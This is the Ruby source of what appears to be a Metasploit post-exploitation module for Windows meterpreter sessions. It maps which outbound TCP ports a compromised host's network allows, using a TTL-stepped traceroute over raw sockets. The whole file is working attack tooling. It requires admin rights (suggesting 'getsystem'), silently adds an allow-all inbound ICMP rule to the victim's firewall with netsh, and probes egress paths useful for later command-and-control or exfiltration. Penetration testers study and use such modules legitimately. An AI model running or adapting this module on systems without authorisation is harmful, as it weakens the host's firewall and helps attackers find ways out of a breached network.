# -*- coding: binary -*- ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) super( update_info( info, 'Name' => 'Windows Outbound-Filtering Rules', 'Description' => %q{ This module makes some kind of TCP traceroute to get outbound-filtering rules. It will try to make a TCP connection to a certain public IP address (this IP does not need to be under your control) using different TTL incremental values. This way if you get an answer (ICMP TTL time exceeded packet) from a public IP device you can infer that the destination port is allowed. Setting STOP to true the module will stop as soon as you reach a public IP (this will generate less noise in the network). }, 'License' => MSF_LICENSE, 'Author' => 'Borja Merino ', 'Platform' => 'win', 'SessionTypes' => ['meterpreter'], 'References' => [ ['URL', 'http://www.shelliscoming.com/2014/11/getting-outbound-filtering-rules-by.html'] ] )) register_options( [ OptAddress.new('ADDRESS' , [ true, 'Destination IP address.']), OptInt.new('HOPS', [true, 'Number of hops to get.', 3]), OptInt.new('MIN_TTL', [true, 'Starting TTL value.', 1]), OptString.new('PORTS', [true, 'Ports to test (e.g. 80,443,100-110).','80,443']), OptInt.new('TIMEOUT', [true, 'Timeout for the ICMP socket.', 3]), OptBool.new('STOP', [true, 'Stop when it finds a public IP.', true]) ]) end def icmp_setup handler = client.railgun.ws2_32.socket("AF_INET", "SOCK_RAW", "IPPROTO_ICMP") if handler['GetLastError'] == 0 vprint_good("ICMP raw socket created successfully") else print_error("There was an error setting the ICMP raw socket; GetLastError: #{handler['GetLastError']}") return nil end r = client.railgun.ws2_32.bind(handler['return'],"\x02\x00\x00\x00" << Rex::Socket.addr_aton(session.session_host) << "\x00"*8 ,16) if r['GetLastError'] == 0 vprint_good("ICMP socket successfully bound to #{session.session_host}") else print_error("There was an error binding the ICMP socket to #{session.session_host}; GetLastError: #{r['GetLastError']}") return nil end # int WSAIoctl( # _In_ SOCKET s, # _In_ DWORD dwIoControlCode, # _In_ LPVOID lpvInBuffer, # _In_ DWORD cbInBuffer, # _Out_ LPVOID lpvOutBuffer, # _In_ DWORD cbOutBuffer, # _Out_ LPDWORD lpcbBytesReturned, # _In_ LPWSAOVERLAPPED lpOverlapped, # _In_ LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine # ); sio_rcvall = 0x98000001 r = client.railgun.ws2_32.WSAIoctl(handler['return'], sio_rcvall, "\x01", 4, nil, 0 ,4, nil, nil) if r['GetLastError'] == 0 return handler['return'] else print_error("There was an error calling WSAIoctl (ICMP raw socket); GetLastError: #{r['GetLastError']}") return nil end end def tcp_setup(ttl) handler = client.railgun.ws2_32.socket('AF_INET', 'SOCK_STREAM', 'IPPROTO_TCP') if handler['GetLastError'] == 0 vprint_status('TCP socket created successfully') else print_error("There was an error setting the TCP socket; GetLastError: #{handler['GetLastError']}") return nil end # 0x8004667E = FIONBIO # Enable non-blocking mode when *argp (third parameter in ioctlsocket) is set to a nonzero value cmd = 0x8004667E r = client.railgun.ws2_32.ioctlsocket(handler['return'], cmd, 1) if r['GetLastError'] == 0 vprint_status('TCP socket successfully configured in non-blocking mode') else print_error("There was an error setting the TCP socket in non-blocking mode; GetLastError: #{r['GetLastError']}") return nil end # int setsockopt( # _In_ SOCKET s, # _In_ int level, # _In_ int optname, # _In_ const char *optval, #_In_ int optlen # ); ipproto_ip = 0 ip_ttl = 4 r = client.railgun.ws2_32.setsockopt(handler['return'], ipproto_ip, ip_ttl, [ttl].pack('C'), 4) if r['GetLastError'] == 0 vprint_status("TTL value successfully set to #{ttl}") return handler['return'] else print_error("There was an error setting the TTL value; GetLastError: #{r['GetLastError']}") return nil end end def connections(remote, dst_port, h_icmp, h_tcp, to) sock_addr = "\x02\x00" sock_addr << [dst_port].pack('n') sock_addr << Rex::Socket.addr_aton(remote) sock_addr << "\x00" * 8 r = client.railgun.ws2_32.connect(h_tcp, sock_addr, 16) # A GetLastError == 1035 is expected since the socket is set to non-blocking mode unless r['GetLastError'] == 10035 print_error("There was an error creating the connection to the peer #{remote}; GetLastError: #{r['GetLastError']}") return end from = ' ' * 16 begin ::Timeout.timeout(to) do r = client.railgun.ws2_32.recvfrom(h_icmp, "\x00" * 100, 100, 0, from, 16) hop = Rex::Socket.addr_ntoa(r['from'][4..7]) return hop end rescue ::Timeout::Error return nil end end def run unless is_admin? print_error("You don't have enough privileges. Try getsystem.") return end if sysinfo['OS'] =~ /XP/ print_error('Windows XP is not supported') return end output = cmd_exec('netsh',' advfirewall firewall add rule name="All ICMP v4" dir=in action=allow protocol=icmpv4:any,any') print_status("ICMP firewall IN rule established: #{output}") session.railgun.ws2_32 remote = datastore['ADDRESS'] to = datastore['TIMEOUT'] ports = Rex::Socket.portspec_crack(datastore['PORTS']) ports.each do |dport| pub_ip = false print_status("Testing port #{dport}...") 0.upto(datastore['HOPS'] - 1) do |i| i = i + datastore['MIN_TTL'] h_icmp = icmp_setup return if h_icmp.nil? h_tcp = tcp_setup(i) return if h_tcp.nil? hop = connections(remote, dport, h_icmp, h_tcp, to) if hop.nil? print_error("#{i} *") else print_good("#{i} #{hop}") unless Rex::Socket.is_internal?(hop) pub_ip = true break if datastore['STOP'] end end client.railgun.ws2_32.closesocket(h_tcp) client.railgun.ws2_32.closesocket(h_icmp) end print_good("Public IP reached. The TCP port #{dport} is not filtered") if pub_ip end end end